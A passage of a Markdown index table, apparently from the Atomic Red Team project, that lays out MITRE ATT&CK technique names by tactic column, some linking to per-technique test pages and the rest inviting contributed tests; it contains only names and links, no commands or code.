| | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Password Policy Discovery](../../T1201/T1201.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
|
||||
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [System Location Discovery](../../T1614/T1614.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
|
||||
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
|
||||
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
|
||||
| | | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Extended Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
|
||||
| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data from Local System](../../T1005/T1005.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Unsecured Credentials](../../T1552/T1552.md) | Backup Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
|
||||
| | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
